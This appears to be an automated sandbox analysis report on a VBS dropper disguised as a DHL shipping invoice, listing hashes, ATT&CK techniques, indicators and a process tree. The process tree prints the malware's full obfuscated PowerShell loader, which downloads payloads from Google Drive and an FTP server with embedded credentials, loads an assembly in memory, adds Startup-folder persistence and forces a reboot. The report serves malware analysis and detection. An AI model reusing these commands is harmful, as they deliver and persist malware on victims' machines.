64fd88ac9100e0b2d1f851fbd7574f1cd1ef32d169f1fd66aaf634cbf0a605c9

Reason

Machine shutdown

General

Target

DHL_Shipping_Invoices_Awb_0000000.vbs
Size

544KB
MD5

f757be4bc8889174f9c6c45d6302e00d
SHA1

07028abbc63ce0ab275c0b495451c38c3f686358
SHA256

42f3a74c4a534ce4ac65b5e14474a905e8fbdcab70cc6d330ef763062b80a2a4
SHA512

8420a5fd3bc27a7ce403b989db088e40d1fdd7a8010159d9e3973160719dc0e32bc31500dc98d3a8ea020138f888d2a5013d7f57f0668b94cbf46b46de15a130
SSDEEP

1536:155555555555555555bMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMg:A

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DHL_Shipping_Invoices_Awb_0000000.vbs	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DHL_Shipping_Invoices_Awb_0000000.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1460	powershell.exe
2832	powershell.exe
2592	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2968	WScript.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2832	powershell.exe
2592	powershell.exe
2584	powershell.exe
1460	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeShutdownPrivilege	1632	shutdown.exe
Token: SeRemoteShutdownPrivilege	1632	shutdown.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2968 wrote to memory of 2832	2968	WScript.exe	30
PID 2968 wrote to memory of 2832	2968	WScript.exe	30
PID 2968 wrote to memory of 2832	2968	WScript.exe	30
PID 2832 wrote to memory of 2592	2832	powershell.exe	32
PID 2832 wrote to memory of 2592	2832	powershell.exe	32
PID 2832 wrote to memory of 2592	2832	powershell.exe	32
PID 2592 wrote to memory of 2584	2592	powershell.exe	33
PID 2592 wrote to memory of 2584	2592	powershell.exe	33
PID 2592 wrote to memory of 2584	2592	powershell.exe	33
PID 2584 wrote to memory of 1824	2584	powershell.exe	34
PID 2584 wrote to memory of 1824	2584	powershell.exe	34
PID 2584 wrote to memory of 1824	2584	powershell.exe	34
PID 2592 wrote to memory of 1460	2592	powershell.exe	35
PID 2592 wrote to memory of 1460	2592	powershell.exe	35
PID 2592 wrote to memory of 1460	2592	powershell.exe	35
PID 2592 wrote to memory of 1632	2592	powershell.exe	37
PID 2592 wrote to memory of 1632	2592	powershell.exe	37
PID 2592 wrote to memory of 1632	2592	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_0000000.vbs"
1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAKQAnAEAAQA' + [char]66 + 'wAEoAOAA3ADUAMQAyAG8Acg' + [char]66 + 'wAHIAZQ' + [char]66 + 'wAG8AbA' + [char]66 + 'lAHYAZQ' + [char]66 + 'kACcALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAaw' + [char]66 + 'yAG8Adw' + [char]66 + '0AGUATgAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbwAtAHcAZQ' + [char]66 + 'uACAAPQAgAHMAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQwAuAGcAag' + [char]66 + 'nAGYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7AGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7AH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAGYARA' + [char]66 + 'ZAGMAbQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAKAAgAD0AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAGYARA' + [char]66 + 'ZAGMAbQAkADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACwAQg' + [char]66 + 'LAEwAUg' + [char]66 + 'VACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHkAYg' + [char]66 + 'uAGoAbQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '5AGIAbg' + [char]66 + 'qAG0AJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '5AGIAbg' + [char]66 + 'qAG0AJAA7AH0AOwAgACkAJw' + [char]66 + '0AE8ATA' + [char]66 + 'jAF8ASw' + [char]66 + 'hADMAWg' + [char]66 + 'mAG8AWAAyAEoASg' + [char]66 + 'yAFYAaA' + [char]66 + 'tAFYAOQ' + [char]66 + 'jAG0AOQ' + [char]66 + 'YAHMAdQ' + [char]66 + 'YAG0AagAxAGcAMQAnACAAKwAgAHEAeQ' + [char]66 + 'mAGwAeQAkACgAIAA9ACAAcQ' + [char]66 + '5AGYAbA' + [char]66 + '5ACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnADIANA' + [char]66 + '1AFgASg' + [char]66 + 'UAHEAYQ' + [char]66 + 'tAGcAeQ' + [char]66 + 'NAHQARg' + [char]66 + '6AGEAaw' + [char]66 + 'QAFIAMQ' + [char]66 + 'xAF8ASQ' + [char]66 + '2AEcAaQ' + [char]66 + 'YAE4AZA' + [char]66 + 'xAGEATgAxACcAIAArACAAcQ' + [char]66 + '5AGYAbA' + [char]66 + '5ACQAKAAgAD0AIA' + [char]66 + 'xAHkAZg' + [char]66 + 'sAHkAJA' + [char]66 + '7ACAAKQAgAEQAVw' + [char]66 + 'nAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHEAeQ' + [char]66 + 'mAGwAeQAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJA' + [char]66 + '7ACAAKQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAOwA=';$tcqrr = $qKKzc; ;$tcqrr = $qKKzc.replace('уЦϚ' , 'B') ;;$nnwch = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $tcqrr ) ); $nnwch = $nnwch[-1..-$nnwch.Length] -join '';$nnwch = $nnwch.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_0000000.vbs');powershell $nnwch
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" tkplB /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:1824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1460
  - - C:\Windows\system32\shutdown.exe
      "C:\Windows\system32\shutdown.exe" /r /t 0 /f
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1632

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1900

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:2140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4E4HB70LRDV0RN3KAG8H.temp

Filesize
7KB

MD5
a7d92fc0a80a03796e902f5321aefd23

SHA1
57186fc811b7e3c38e9a6c893b4813366c12f4a9

SHA256
41ee2239530d95f04923afa359dcb8192fa9880c79a3494917473f34cc1fb2b8

SHA512
17c9c3a7ea37c0995272c6679c241a448cbe8ba888c6d09cb33a404083c6006eb545528c7b8c6e77dd67e6129f8d6146fd914c0e92d0de1390a1affed69bda3e

Download Submit
memory/2832-4-0x000007FEF69FE000-0x000007FEF69FF000-memory.dmp

Filesize
4KB

Download
memory/2832-5-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2832-7-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-6-0x0000000002990000-0x0000000002998000-memory.dmp

Filesize
32KB

Download
memory/2832-8-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-9-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-10-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-12-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-29-0x000007FEF69FE000-0x000007FEF69FF000-memory.dmp

Filesize
4KB

Download
memory/2832-30-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

Errors